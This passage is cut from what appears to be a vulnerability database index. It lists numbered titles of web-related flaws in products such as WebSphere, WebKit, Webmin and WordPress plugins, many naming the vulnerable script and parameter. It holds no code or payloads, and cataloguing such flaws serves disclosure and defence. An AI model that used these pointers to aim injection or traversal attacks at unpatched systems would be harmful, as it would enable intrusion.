Overflow [89451] Cisco WebEx Training Center Testing Library testingLibraryAction.do Test Deletion CSRF [89449] Cisco WebEx Social RSS Service Link Unspecified XSS [89429] RuggedCom Rugged Operating System on LinuX (ROX II) Unspecified Web UI XSS [89423] Webimage Multiple Script Malformed opt4 Parameter Path Disclosure [89422] NETGEAR DGND3700 Admin Interface Router URI Traversal Arbitrary File Access [89407] Foswiki WebSearch Crafted Search String Remote DoS [89399] Jenkins /WEB-INF/web.xml Direct Request Remote Information Disclosure [89374] RuggedCom Rugged Operating System (ROS) Unspecified Unauthorized Web-Based Management Authentication Bypass [89369] Foswiki WebNotify Function Subscribed Trashed Topic Handling DoS [89362] RuggedCom Rugged Operating System (ROS) IP Stack / Web Server Memory Leak Remote DoS [89346] SonicWALL Multiple Product SGMS Interface User Password Change Request Handling Admin Password Manipulation [89325] Barracuda Web Application Firewall Unspecified XSS [89309] RESTful Web Services Module for Drupal Unspecified CSRF [89277] NETGEAR Multiple Router Admin Interface Default Credentials [89231] Oracle Siebel CRM Highly Interactive Web UI Subcomponent Unspecified Remote Information Disclosure [89207] Oracle Enterprise Manager Grid Control Enterprise Manager Base Platform Component User Interface Framework Subcomponent Unspecified Remote Issue [89191] Oracle Access Manager OAM Webgate Subcomponent Unspecified Remote Issue [89190] Oracle WebLogic Server Web Container Subcomponent Unspecified Remote DoS [89171] IBM Cognos TM1 Web Component Unspecified XSS [89161] Webimage /webimage/imagemanage.php editobj_name Parameter File Upload Arbitrary Code Execution [89113] WeBid validate.php Multiple Parameter SQL Injection [89100] IBM Tivoli Access Manager WebSEAL illegal-url-substrings Feature Unspecified Bypass [89067] Advantech WebAccess /broadWeb/include/gAddNew.asp ProjDesc Parameter XSS [89061] IBM WebSphere MQ Advanced Message Security WMQ Message Flow Cleartext Message Disclosure [89057] General Electric (GE) Proficy HMI/SCADA - CIMPLICITY CimWebServer.exe HTTP Data Parsing Integer Overflow [89046] Concert Calendar Addon for WebsiteBaker modules/concert/view.php date Parameter XSS [89045] Concert Calendar Addon for WebsiteBaker modules/concert/view.php date Parameter SQL Injection [89005] Mozilla Multiple Product Mesa WebGL Canvas Resizing Use-after-free Arbitrary Code Execution [88961] Microsoft System Center Operations Manager Web Console /InternalPages/ExecuteTask.aspx __CALLBACKPARAM Parameter XSS [88960] Microsoft System Center Operations Manager Web Console Unspecified XSS (2013-0009) [88925] Advantech Studio NTWebServer.exe sub_401A90 Routine CreateFileW Function Absolute Path Request Arbitrary File Access [88898] RuggedCom Rugged Operating System (ROS) / ROX Guest/Operator Web Form Manipulation Privilege Escalation [88877] Simple Web Server Traversal Arbitrary File Access [88876] Asterisk HTTP Asterisk Management Interface 'ast_http_get_post_vars' Remote Stack Corruption [88872] cPanel WebHost Manager (WHM) /webmail/x3/mail/filters/editfilter.html filtername Parameter XSS [88773] cPanel WebHost Manager (WHM) /webmail/x3/mail/clientconf.html acct Parameter XSS [88765] Boat Browser for Android WebView Class Crafted Application Information Disclosure [88764] Opera for Android WebView Class Crafted Application Information Disclosure [88724] EMC Data Protection Advisor Web UI Traversal Arbitrary File Access [88719] Novell iPrint Client op-client-interface-version Parameter Unspecified Remote Code Execution [88659] Kiwi Syslog Telerik.Web.UI.WebResource.axd Multiple Parameter SQL Injection [88646] Oracle Sun GlassFish Web Space Server Liferay Component Unspecified Traversal [88638] Jetty on Windows Mixed Case WEB-INF Request Security Bypass [88629] Sony PC Companion WebServices.dll DownloadURLToFile() Function bstrFile Parameter Stack Overflow [88624] IBM WebSphere Application Server (WAS) on z/OS HTTP Server Unspecified Remote Command Execution [88581] Squid Web Proxy HTTP Accelerator Mode Proxied Port Scan Weakness [88553] IBM Rational Automation Framework (RAF) Web UI Authentication Bypass [88518] IBM InfoSphere Information Server Web Console Multiple Unspecified Issues [88515] IBM InfoSphere Information Server Web Console Reporting Simple / Advanced Search XSS [88503] IBM WebSphere DataPower Integration Appliance Malformed MIME Type Header Processing Remote Device Restart DoS [88502] IBM WebSphere DataPower Integration Appliance URL-OPEN() Function Malformed URI Handling Device Restart Remote DoS [88501] IBM WebSphere DataPower Integration Appliance SOAP Message MIME Attachment Handling Race Condition Remote Device Restart DoS [88500] IBM WebSphere DataPower Integration Appliance MQGET_REPLY MPH Field Handling Remote Device Restart DoS [88499] IBM WebSphere DataPower Integration Appliance MQ Server Corrupted Binary Message Processing Remote Device Restart DoS [88498] IBM WebSphere DataPower Integration Appliance Expired Certificate Acceptance Weakness [88496] Splunk splunkweb Custom App Remote Code Execution [88482] IBM WebSphere DataPower Integration Appliance Malformed WSDL Code Processing Remote Device Restart DoS [88481] IBM WebSphere DataPower Integration Appliance SOAP Request 'Validate by Schema Attribute' Action Handling Remote Device Restart DoS [88480] IBM WebSphere DataPower Integration Appliance ldap-search() Extension Function Remote Device Restart DoS [88456] Smartphone Pentest Framework androidwebkit.pl Remote Command Execution [88446] IBM Rational ClearQuest OSLC Interface System Unspecified XSS [88429] IBM Lotus Notes Web Applications Unspecified XSS [88428] IBM Lotus Foundations Start Webconfig Users Page Multiple User Attribute Field XSS [88388] Cisco Wireless LAN Controllers (WLC) /screens/base/web_auth_custom.html headline Parameter XSS [88386] Cisco Wireless LAN Controllers (WLC) /screens/base/web_auth_custom.html Crafted GET Request Parsing Remote DoS [88373] WebKit Visibility Event Handling Use-after-free Issue [88370] Cerberus FTP Server Web Admin /servermanager Messages Tab Multiple Field XSS [88368] Citrix XenApp XML Service Interface Crafted Packet Parsing Remote Code Execution [88362] Stoneware WebNetwork blogSearch.jsp blogName Parameter XSS [88361] Stoneware WebNetwork setAppFlag.jsp flag Parameter XSS [88360] Stoneware WebNetwork blog.jsp blogName Parameter XSS [88359] Stoneware WebNetwork calendar.jsp Multiple Parameter XSS [88259] Incomedia WebSite X5 Evolution /imsearch.php search Parameter XSS [88258] Incomedia WebSite X5 Evolution /admin/checkaccess.php Authentication Bypass [88244] BugTracker.NET view_web_config.aspx path Parameter XSS [88234] BugTracker.NET view_web_config.aspx Response.WriteFile() Function Arbitrary File Disclosure [88186] Kent Web Access Report Tag Embedding Unspecified XSS [88185] Kent Web Access Report Access Log Data Unspecified XSS [88160] IBM WebSphere Portal Theme Component LayerLoader.jsp Traversal Arbitrary File Access [88116] OurWebFTP index.php Multiple Parameter XSS [88087] Fortinet FortiWeb /waf/pcre_expression/validate Multiple Parameter XSS [88061] WebKit Media Source Handling Use-after-free Arbitrary Code Execution [88057] IBM WebSphere Message Broker Uninstaller File Permissions Local Privilege Escalation [88047] IBM WebSphere Operational Decision Management RTS Error Page Cause Message XSS [88042] IBM WebSphere Message Broker Configuration Manager V5 Imported ACL Implenetation Failure [88036] IBM WebSphere Message Broker Unspecified Issue [88034] IBM WebSphere MQ /var/sadm/pkg/mqm-06-00-02-01/save Permission Weakness Local DoS [88033] IBM WebSphere MQ Application Process Heap Corruption runmqlsr Listener Remote DoS [88031] IBM WebSphere MQ reset_iconv_tables Permission Setting Weakness [88025] IBM WebSphere MQ COM+/MTS Environment Queue Manager Connection Saturation Remote DoS [88017] Anti-Web HTTPD (awhttpd) Nonexistent File Handling Local DoS [88004] McAfee Email Gateway Secure Web Mail Client Message Saturation Disk Space Consumption DoS [87979] Webmail Plus Module for Drupal Unspecified SQL Injection [87963] IBM WebSphere Operational Decision Management Decision Center action.jsp Arbitrary Project Deletion [87958] IBM WebSphere Message Broker ProxyServlet / MQ HTTP Connection Cleartext Credential Disclosure [87956] IBM WebSphere DataPower Integration Appliance Multi-Protocol Gateway / Web Service Proxy Crafted Message Handling Remote Device Restart DoS [87954] IBM WebSphere Operational Decision Management ILOG Rule Team Server Decision Center /teamserver/faces/home.jsp project Parameter Unspecified Issue [87950] JBoss Enterprise Portal Platform Web Services W3C XML Encryption Standard Implementation CBC Mode SOAP Response Chosen-ciphertext Attack [87944] IBM WebSphere MQ Unspecified Issue [87942] IBM WebSphere Message Broker HTTP Request Node Handling Remote Overflow [87937] IBM WebSphere MQ /opt/mqm/ssl/jre/javaws/javaws Permission Weakness Local Privilege Escalation [87936] IBM WebSphere MQ /opt/mqm/licenses Permission Weakness Local Privilege Escalation [87935] IBM WebSphere Message Broker Java User Defined Node (UDN) Handling Remote Overflow [87934] IBM WebSphere Message Broker ConfigManagerProxy trace.txt Symlink Local Privilege Escalation [87933] IBM WebSphere MQ Java Message Service (JMS) Class Password Truncation Weakness [87930] IBM WebSphere Message Broker for z/OS Configuration Manager Non-primary Group ACL Implementation Failure [87923] AR Web Content Manager (AWCM) Comment Record Saturation Remote DoS [87922] AR Web Content Manager (AWCM) cookie_gen.php Arbitrary Cookie Generation Weakness [87919] IBM WebSphere DataPower Integration Appliance Empty SubjectKeyID Certificate Display Weakness [87913] IBM WebSphere DataPower Integration Appliance SSL Proxy DNS Resolution Timeout Device Restart DoS [87912] IBM WebSphere DataPower Integration Appliance Service Probe Malformed WSDL Element handling Device Restart DoS [87911] IBM WebSphere DataPower Integration Appliance Malformed S/MIME Message Header Handling Remote Device Restart DoS [87903] IBM WebSphere DataPower Integration Appliance SwA / MTOM Message Handling Remote Device Restart DoS [87902] IBM WebSphere DataPower Integration Appliance Multiple Condition Stylesheet Processing Remote Device Restart DoS [87901] IBM WebSphere DataPower Integration Appliance IMS Connect Handler Request Saturation Remote Device Restart DoS [87897] IBM WebSphere DataPower Integration Appliance SFTP Log Target Welcome Banner Handling Remote Device Restart DoS [87886] Google Chrome PrintWebViewHelper::PrintNode() Function Use-after-free Issue [87885] Google Chrome WebElement::hasHTMLTagName Function Input Element Handling Bad Cast Issue [87884] WebKit SVG Filter feImage Element Self-reference Processing Use-after-free [87867] Websense Crafted GET Request URL Filter Bypass [87860] Beat Websites page_detail.php id Parameter SQL Injection [87840] playSMS inc/app/webservices.php Arbitrary User SMS Message Sending Weakness [87833] Zingiri Web Shop Plugin for WordPress /fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php path Parameter File Upload Arbitrary Code Execution [87832] Webplayer Plugin for WordPress wp-content/plugins/webplayer/config.php id Parameter SQL Injection [87809] WeBid Arbitrary Code Execution CSRF [87808] WeBid admin/settings.php Your copyright message Field XSS [87807] WeBid loader.php js Parameter Traversal Arbitrary file Access [87802] WeBid converter.php AMOUNT Parameter XSS [87801] WeBid profile.php auction_id Parameter XSS [87800] WeBid friend.php Multiple Parameter XSS [87799] WeBid register.php TPL_nick Parameter XSS [87796] ownCloud /apps/user_webdavauth/settings.php Unspecified XSS [87793] Webform CiviCRM Integration Module for Drupal Enforce Permissions Weakness [87782] libunity-webapps Unspecified Use-after-free Arbitrary Code Execution [87721] IBM WebSphere Application Server (WAS) EJB Feature Pack Property File Plaintext Password Local Disclosure [87715] Serv-U FTP Server Web Client Unspecified XSS [87701] Website Photo Gallery (jm_gallery) Extension for TYPO3 Multiple Unspecified SQL Injection [87624] BIGACE Web CMS Unspecified Session Fixation [87620] IBM WebSphere DataPower XC10 Admin Operation JMX Handling Remote Command Execution [87611] Google Web Toolkit (GWT) Tree[Item].addItem / insertItem(String html) Function XSS [87610] Google Web Toolkit (GWT) Unspecified XSS [87601] Mozilla Multiple Product webgl bufferdata Handling Overflow [87571] IBM WebSphere Portal Theme Component Unspecified URL Manipulation Issue [87570] Splunk Web Component Non-RFC Compliant Browser Unspecified XSS [87569] Splunk Web Component Unspecified XSS (SPL-55157) [87564] Sophos UTM WebAmin Login Screen Last Webadmin Sessions Unspecified XSS [87550] Media Player Classic (MPC) WebServer browser.html path Parameter XSS [87549] Media Player Classic (MPC) WebServer Request Handling Remote DoS [87548] Adobe InDesign Server SOAP Interface RunScript SOAP Message Parsing Remote Command Execution [87521] WebKit html/parser/XSSAuditor.cpp String Parsing XSS Protection Bypass Weakness [87508] Bugzilla /WebService/User.pm User.get Method Arbitrary User Saved Search Remote Information Disclosure [87440] Sybase EAServer Web Services Toolkit XML Parser Unspecified DoS [87407] RESTful Web Services Module for Drupal Unspecified CSRF [87341] IBM WebSphere Application Server (WAS) Liberty Profile Unspecified URI XSS [87340] IBM WebSphere Application Server (WAS) Liberty Profile JAX-RS Request Validation Remote Privilege Escalation [87339] IBM WebSphere Application Server (WAS) Information Disclosure CSRF [87338] IBM WebSphere Application Server (WAS) Crafted Request Parsing Remote DoS [87266] Microsoft .NET Framework Web Proxy Setting Auto-Discovery (WPAD) Handling Remote Code Execution [87249] icedtea-web IcedTeaScriptablePluginObject.cc invoke() Function Applet Event Exception Message Handling Overflow [87244] IBM WebSphere MQ Queue Manager Asynchronous Customer Message Parsing Remote DoS [87230] FreeWebshop index.php Multiple Parameter SQL Injection [87229] FreeWebshop index.php searchfor Parameter XSS [87228] FreeWebshop setlang.php redirect_to Parameter XSS [87180] Weberknecht X.509 Certificate Domain Name Matching MiTM Weakness [87136] VeriCentre WebConsole/terminal/paramedit.aspx Multiple Parameter SQL Injection [87102] Opera WebP Image File Handling Out-of-bounds Read Information Disclosure [87079] Google Chrome WebP Image File Handling Out-of-bounds Read Information Disclosure [87050] Webmin Real Name Field XSS [87049] XBMC Web Server Encoded Traversal Arbitrary File Access [87044] IBM WebSphere DataPower XC10 / eXtreme Scale Server-to-Server Hardcoded Secret Token [87043] IBM WebSphere DataPower XC10 / eXtreme Scale Server-to-Server Secret Token Cleartext Disclosure [86873] WebKit JavaScript Array Handling Race Condition Arbitrary Code Execution [86859] Cisco Unified MeetingPlace Web Conferencing Component HTTP POST Request Parsing Remote Overflow DoS [86858] OrangeHRM /symfony/web/index.php sortField Parameter SQL Injection [86834] VOlk-Botnet Visit Webpage Open URL Bots: Field XSS [86797] Juniper Junos Missing Client-match Statement Web-authentication Policy Enforcement Weakness [86754] Easy Webinar Plugin for WordPress get_widget.php wid Parameter SQL Injection [86722] Come on Girls Interface (CGI) Tokyo BBS tokyo_bbs.cgi Error Page XSS [86687] MailChimp Module for Drupal Watchdog Logging webhook Type XSS [86583] libsocialweb services/flickr/flickr.c Flickr Service SSL Certificate Validation MitM Weakness [86570] Mutiny Unspecified Network Interface Menu Remote Command Execution [86501] Samsung Kies CmdAgent.dll ICommandAgent Interface Multiple Method Remote Privilege Escalation [86431] BTicino Legrand Home Gateway TiWeb.xml Direct Request Admin Credential Disclosure [86413] Logica HotScan Listener Interface Crafted Packet Parsing Remote Overflow [86373] Oracle Business Intelligence Enterprise Edition /em/console/help/webapp/HELP_10.1.3_NT_060914.0911.178/ohw_jslibs/vt_chrome.js URI XSS [86348] Oracle Java SE / JRE Web Start Component JNLP File Multiple Parameter Double Quote Handling Arbitrary Code Execution [86325] Oracle Agile PLM Framework Web Client (CS) Subcomponent Unspecified Remote Issue [86301] Oracle WebCenter Sites ImagePicker Subcomponent Unspecified Local Issue [86300] Oracle WebCenter Sites Advanced UI Subcomponent /cs/ContentServer Multiple Parameter XSS [86299] Oracle WebCenter Sites Advanced UI Subcomponent /cs/ContentServer selectedLocale Parameter SQL Injection [86298] Oracle WebCenter Sites Advanced UI Subcomponent /cs/ContentServer Arbitrary User Password Manipulation CSRF [86297] Oracle WebCenter Sites Advanced UI Subcomponent /cs/ContentServer Arbitrary User Email Address Manipulation [86296] Oracle Imaging and Process Management Web Subcomponent Unspecified Remote Information Disclosure (2012-0095) [86295] Oracle Imaging and Process Management Web Subcomponent Unspecified Remote Information Disclosure (2012-0108) [86294] Oracle Imaging and Process Management Web Subcomponent Unspecified Remote Issue (2012-0092) [86293] Oracle Imaging and Process Management Web Subcomponent Unspecified Remote Issue (2012-0090) [86292] Oracle Imaging and Process Management Web Subcomponent Unspecified Remote Information Disclosure (2012-0086) [86291] Oracle Imaging and Process Management Web Subcomponent Unspecified Remote DoS [86290] Oracle Imaging and Process Management Web Subcomponent Unspecified Remote Issue (2012-0093) [86289] Oracle Imaging and Process Management Web Subcomponent Unspecified Remote Issue (2012-0071) [86288] Oracle Imaging and Process Management Web Subcomponent Unspecified Remote Issue (2012-0106) [86244] SpamTitan WebTitan urls-x.php Multiple Parameter SQL Injection [86243] SpamTitan WebTitan login-x.php username Parameter SQL Injection [86242] SpamTitan WebTitan logs-x.php fname Parameter Traversal Arbitrary File Access [86241] SpamTitan WebTitan tools.php Argument Shell Metacharacter Remote Command Execution [86215] WebCalendar view_entry.php Multiple Parameter XSS [86169] Web Help Desk Ticket System Multiple Field XSS [86168] Web Help Desk Rejected Email XSS [86164] Basic webmail Module for Drupal Page Title XSS [86163] Basic webmail Module for Drupal Permission Weakness User Email Disclosure [86162] Basic webmail Module for Drupal Emails XSS [86149] WebKit SVGElementInstance::detach Function Use-after-free Arbitrary Code Execution [86143] Cisco WebEx Recording Format Player Unspecified WRF File Handling Overflow (2012-3938) [86142] Cisco WebEx Recording Format Player Unspecified WRF File Handling Overflow (2012-3937) [86141] Cisco WebEx Recording Format Player Unspecified WRF File Handling Overflow (2012-3936) [86140] Cisco WebEx Recording Format Player Unspecified WRF File Handling Overflow (2012-3941) [86139] Cisco WebEx Recording Format Player Unspecified WRF File Handling Overflow (2012-3940) [86138] Cisco WebEx Recording Format Player Unspecified WRF File Handling Memory Corruption [86130] Siemens SIMATIC S7-1200 Web Server Component Unspecified XSS [86065] Xataface WebAuction / Librarian DB index.php Multiple Parameter XSS [86064] Xataface WebAuction / Librarian DB index.php lang Parameter Traversal Arbitrary File Access [86063] Xataface WebAuction / Librarian DB index.php Malformed -action Parameter Path Disclosure [86062] Xataface WebAuction / Librarian DB index.php table Parameter SQL Injection [86052] webERP WorkOrderEntry.php FormID Parameter SQL injection [86023] Akiva WebBoard Admin Profile HTML Source Administrator Cleartext Password Disclosure [86015] EasyWebRealEstate listings.php lstid Parameter SQL Injection [86014] EasyWebRealEstate index.php infoid Parameter SQL Injection [85994] Final Beta Laboratory MyWebSearch keywords Parameter XSS [85983] SAP NetWeaver Mobile Infrastructure Web Console Unspecified XSS [85976] xClick Cart webscr.php shopping_url Parameter XSS [85971] WireShark Remote Interface Addition Multiple Field Overflow [85963] web@all /webatall/sys/index.php _order Parameter SQL Injection [85962] web@all /webatall/sys/action.php Multiple Parameter XSS [85960] WebPA Crafted Cookie Parsing Authentication Bypass [85944] Wiki Web Help Node Option Addition New Page Name Field XSS [85943] Wiki Web Help Edit Tags Tags Field XSS [85938] Wiki Web Help Page Body XSS [85922] Dart Communications DartWebserver.Dll Web Request Parsing Remote DoS [85890] GNOME gnome-shell Crafted Web Page Plugin Arbitrary Extension Installation [85868] IBM WebSphere Commerce Unspecified Profile Data Disclosure [85867] IBM Rational Business Developer Web Services Unspecified Remote Information Disclosure [85837] IBM Net.Commerce / WebSphere Password Encoding Weakness [85819] jigbrowser+ Application for Android WebView Class Implementation Application Handling Information Disclosure [85801] Novell GroupWise Agent HTTP Interface Traversal Arbitrary File Access [85800] Novell GroupWise WebAccess Component HTML Email Signature XSS [85789] Cisco Secure Desktop (CSD) WebLaunch Functionality Arbitrary Code Execution [85775] WebKit Frame Element Handling Universal XSS [85771] WebKit SVG Text Reference Handling Use-after-free Issue [85759] WebKit ContainerNode::replaceChild Bad DOM Topology DoS Weakness [85753] Google Chrome IPC Print Preview WebUI Memory Address Disclosure Weakness [85741] IBM WebSphere Commerce Enterprise REST Services Framework Unspecified Access Restriction Bypass [85740] IBM WebSphere Commerce Enterprise Persistent Session / Personalized ID Handling Resource Consumption Remote DoS [85735] IBM WebSphere Application Server (WAS) for z/OS CBIND Check Handling Local Data Manipulation [85734] IBM WebSphere Application Server (WAS) Authentication Cache Password Purging Failure [85733] IBM WebSphere Application Server (WAS) Unspecified Remote Session Hijacking [85732] IBM WebSphere Application Server (WAS) Unspecified Traversal Arbitrary File Overwrite [85728] IBM WebSphere MQ Server Message Channel Agent Address Alignment Exception Handling Remote DoS [85714] SilverStripe code/sitefeatures/PageCommentInterface.php User Comment Submission Cookie Deserialization Handling Remote Code Execution [85664] Novell GroupWise WebAccess Component Search Document Form merge Parameter XSS [85651] Apple Mac OS X Profile Manager Device Management Private Interface Managed Device Enumeration [85648] Apple Mac OS X Email Message Handling Web Plugin Execution [85633] Apple iOS UIKit UIWebView Unencrypted File Disclosure [85631] WebKit Unspecified Memory Corruption (2012-3747) [85605] Cybozu KUNAI Browser for Remote Service Application Beta for Android WebView Class file: URL Application Handling Arbitrary Code Execution [85590] Uebimiau Webmail Address Book Name Field XSS [85589] Uebimiau Webmail readmsg.php Email Subject XSS [85558] LuxCal Web Calendar pages/phpinfo.php Direct Request Information Disclosure [85557] LuxCal Web Calendar lcaldbc.dat Direct Request Encrypted Information Disclosure [85556] LuxCal Web Calendar index.php cD Parameter XSS [85555] LuxCal Web Calendar dloader.php fName Parameter Traversal Arbitrary File Access [85550] Moodle webservice/lib.php External Service Token Cross-service Usage Weakness [85541] Barracuda Web Filter Authentication Functionality Multiple Field XSS [85507] IlohaMail Webmail Bookmark Functionality Multiple Field XSS [85506] IlohaMail Webmail E-mail Body XSS [85504] T-dah WebMail addressbook.php New Contact Creation CSRF [85498] IceWarp Mail Server WebMail Component webmail/pda/controller/raw.php phpinfo() Function PHP Configuration Information Disclosure [85495] Webmin file/show.cgi Authentication Credential Hijack CSRF [85489] Cybozu KUNAI for Android WebView Class file: URI XSS [85475] Eucalyptus Cloud Controller / Walrus SOAP Web Service Components Authorization Mechanism Authentication Bypass [85473] Eucalyptus Cloud Controller / Walrus SOAP Web Service Components Internal Format Message Submission Credential Validation Remote Privilege Escalation [85469] T-dah WebMail addressbook.php Multiple Field XSS [85468] T-dah WebMail Calendar Event Message Field XSS [85467] WeBid admin/logout.php include_path Parameter Remote File Inclusion [85466] WeBid getthumb.php w Parameter Traversal Arbitrary File Access [85416] WebKit 'HTMLAppletElement::renderWidgetForJSBindings' Function Inline Applet Bad Cast Memory Corruption [85415] WebKit SVGElement::isOutermostSVGSVGElement Shadow Tree Parent Confusion Memory Corruption [85414] WebKit Unspecified Memory Corruption (2012-3602) [85413] WebKit :first-letter Pseudo Element Floats Handling Use-after-free Issue [85412] WebKit 'ApplyStyleCommand::joinChildTextNodes' Function Use-after-free Issue [85411] WebKit Paragraph Separator Insertion Use-after-free Issue [85410] WebKit 'ReplaceSelectionCommand::performTrivialReplace' Function Use-after-free Issue [85409] WebKit Object Element Reattaching Content Comparison Memory Corruption [85408] WebKit CSS Parser Incomplete ':not' Selector Memory Corruption [85407] WebKit 'AccessibilityRenderObject::contentChanged' Function Use-after-free Issue [85406] WebKit 'swapInNodePreservingAttributesAndChildren' Function Use-after-free Issue [85405] WebKit Element::setAttributeInternal Hidden Input Type Switching Use-after-free Issue [85404] WebKit Inline Box For Floating / Position Objects In Isolates Creation Use-after-free Issue [85403] WebKit Unspecified Memory Corruption (2012-3649) [85402] WebKit Unspecified Memory Corruption (2012-3648) [85401] WebKit CharacterData::setData Text Node DOMCharacterDataModified Event Handling Use-after-free Issue [85400] WebKit Orphan Tree Parent Node With Child Deletion Use-after-free Issue [85399] WebKit Unspecified Memory Corruption (2012-3632) [85398] WebKit Paragraph Separator Insertion Use-after-free Issue [85397] WebKit 'CompositeEditCommand::breakOutOfEmptyListItem' Function Use-after-free Issue [85396] WebKit 'DragController::concludeEditDrag' Function Use-after-free Issue [85394] WebKit Fixed Position Element Handling Memory Corruption [85393] WebKit Cached Image Handling Use-after-free Issue [85392] WebKit Unspecified Memory Corruption (2012-3709) [85391] WebKit Document::removedLastRef Document Cleanup Use-after-free Issue [85390] WebKit SVG Intersection List Handling Use-after-free Issue [85389] WebKit SVGSMILElement::svgAttributeChanged Dynamic attributeName Modification Use-after-free Issue [85388] WebKit Shadow DOM Subtree Event Dispatching Memory Corruption [85387] WebKit SVGAnimatedPropertyTearOff Deletion Use-after-free Issue [85386] WebKit Unspecified Memory Corruption (2012-3703) [85385] WebKit XHR Multiple Cancel/Restart Re-entrancy Use-after-free Issue [85384] WebKit Cross-Origin Video Posting Use-after-free Issue [85382] WebKit Unspecified Memory Corruption (2012-3700) [85381] WebKit AudioNodeOutput::disconnectAllParams Audio Node Handling Use-after-free Issue [85380] WebKit RenderObject::containingBlock Absolute Positioned Object Handling Use-after-free Issue [85379] WebKit 'RenderObject::absoluteBoundingBoxRect' Function Use-after-free Issue [85378] WebKit Unspecified Memory Corruption (2012-3687) [85377] WebKit Unspecified Memory Corruption (2012-3685) [85376] WebKit 'StyleResolver::styleForElement' Function Dynamic Title Setting Memory Corruption [85375] WebKit Unspecified Memory Corruption (2012-3677) [85374] WebKit 'RenderTableCol::isChildAllowed' Function Table Column Display Handling Memory Corruption [85373] WebKit Progress Element Run-in Displaying Memory Corruption [85372] WebKit 'RenderBlock::layoutInlineChildren' Function Use-after-free Issue [85371] WebKit 'RenderBlock::updateFirstLetterStyle' Function Use-after-free Issue [85370] WebKit 'RenderObject::setAncestorLineBoxDirty' Function Use-after-free Issue [85369] WebKit Unspecified Memory Corruption (2012-3660) [85368] WebKit Scrollbar Handling Use-after-free Arbitrary Code Execution [85367] WebKit 'RenderBlock::blockBeforeWithinSelectionRoot' Function Memory Corruption [85366] WebKit 'RenderBlock::splitBlocks' Function Elements Splitting Use-after-free Issue [85365] WebKit Unspecified Memory Corruption (2012-3651) [85340] Juniper Junos lo0 Loopback Interface discard Filter Term Firewall Bypass [85337] Juniper Junos J-Web Component index.php XSS [85336] Juniper Junos J-Web Component Hash Collision Web Form Post Parsing Remote DoS [85323] Siemens SIMATIC WinCC WebNavigator Component Unspecified XSS [85320] Siemens SIMATIC WinCC WebNavigator Component SOAP Messages SQL Injection [85318] Siemens SIMATIC WinCC WebNavigator Component Unspecified Traversal Arbitrary File Access [85311] PacketFence web.pm web_node_register Function Remote Code Execution [85308] Mobclix Ad Library for Android com.mobclix.android.sdk.MobclixJavascriptInterface Location Change Remote Disclosure [85298] Cart32 c32web.exe Multiple Directive Path Disclosure [85297] Cart32 c32web.exe ShowProgress Function CPU Consumption Remote DoS [85261] Cybozu Live for Android WebView Class Application Handling Local File: URL Handling Arbitrary JavaScript Code Execution [85258] HONEYWELL HMIWeb Browser HSCDSPRenderDLL ActiveX Overflow [85248] Webmin show.cgi open() Function Call Remote Shell Command Execution [85247] Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access [85246] Webmin edit_mon.cgi Monitor Type Name Remote Perl Code Execution [85245] Webmin save_mon.cgi Monitor Type Name Remote Perl Code Execution [85191] playSMS web/plugin/tools/sendfromfile.php Uploaded CSF File Handling SMS Message Spoofing [85142] Roundcube Webmail Email Body / Signature XSS [85101] Websense Email Security SMTP Component Sefault SSL Cipher Key Weakness [85100] Websense Web Security TRITON Management Console Crafted Cookie Authentication Bypass [85099] Websense Email Security Personal Email Manager Component JBoss Status Page Crafted Query Unspecified Information Disclosure [85098] Websense Email Security SMTP 8BITMIME EHLO Keyword Sender-based Blacklist Bypass [85097] Websense Email Security Rules Service Crafted Attachment Remote DoS [85096] Websense Email Security Receive Service Blacklist Domain Extension Bypass Weakness [85095] Websense V10000 Appliance File Buffering Overflow Remote DoS [85094] Websense V10000 Appliance Invalid Login Intermittent LDAP Authentication Availability Remote DoS [85093] Websense Web Security / Web Filter Filtering Service Malformed URI Parsing Remote DoS (2009-5132) [85070] Asterisk Manager Interface ExternalIVR Application Originate Action Handling Remote Shell Command Execution [85064] HD Webplayer Plugin for WordPress wp-content/plugins/webplayer/config.php id Parameter SQL Injection [85063] HD Webplayer Plugin for WordPress wp-content/plugins/webplayer/playlist.php videoid Parameter SQL Injection [85044] Websense Web Security / Web Filter Remote Filtering Component Traffic Saturation Remote DoS [85043] Websense Web Security / Web Filter Filtering Service Malformed URI Parsing Remote DoS (2010-5145) [85042] Websense Web Security / Web Filter Remote Filtering Component Local File Manipulation Filter Bypass [85041] Websense Web Security / Web Filter HTTPS Session Cookie Secure Flag Weakness [85040] Websense Web Security / Web Filter URL Handling Remote Overflow DoS [85031] WebKit Input / Textarea Element display:run-in Handling Bad Cast Memory Corruption [85030] WebKit RenderBlock::LineBreaker::nextLineBreak Line Break Handling Out-of-bounds Read Issue [85027] Symantec Messaging Gateway Unspecified Web Application Modification [85025] IBM WebSphere Application Server (WAS) Unspecified Admin Authentication Bypass [85003] Mozilla Multiple Product Web Console eval() Remote Code Execution [84993] Mozilla Multiple Product WebGL Shader Use-after-free Remote Code Execution [84983] Websense Enterprise Filtering Service IP Address URL Categorization HTTP Request Parsing Filter Bypass [84924] GREE Multiple Applications for Android WebView Class Implementation Application Handling Information Disclosure [84918] IBM WebSphere Application Server (WAS) Global Security Kit (GSKit) TLS Handshake Protocol ClientHello Message Parsing Remote DoS [84881] McAfee Host Data Loss Prevention (DLP) Web Post Protection Feature Local Information Disclosure [84861] Websense Content Gateway monitor/m_overview.ink menu Parameter XSS [84852] McAfee Email and Web Security / Email Gateway Unspecified XSS [84851] McAfee Email and Web Security / Email Gateway Unspecified Admin Authentication Bypass [84846] GWebmail gwebmail/?mail#Inbox.Search/ URI XSS [84845] GWebmail Account Page Name Field XSS [84844] GWebmail gwebmail/setup Multiple Field XSS [84843] GWebmail webmail/ module Parameter Traversal Arbitrary File Access [84842] GWebmail gwebmail/?mail# URI XSS [84840] GWebmail Email Subject Field XSS [84832] Squiz CMS /__web/Systems/UnregisteredDomainWidget Traversal Arbitrary File Access [84817] OrderSys ordering/interface_creator/index_short.php Multiple Parameter XSS [84816] OrderSys ordering/interface_creator/index_long.php Multiple Parameter XSS [84812] OrderSys ordering/interface_creator/login.php Multiple Parameter XSS [84807] Zingiri Web Shop Plugin for WordPress index.php Multiple Cookie Parameter SQL Injection [84745] Dir2web system/src/dispatcher.php oid Parameter SQL Injection [84744] Dir2web system/db/website.db Direct Request Remote Information Disclosure [84741] Roundcube Webmail program/lib/washtml.php Email Body href HTML Attribute XSS [84740] Roundcube Webmail program/steps/mail/func.inc Larry Skin Email Subject XSS [84694] T-dah WebMail Email Message Body XSS [84661] HP Service Manager and Service Center Web Tier Unspecified 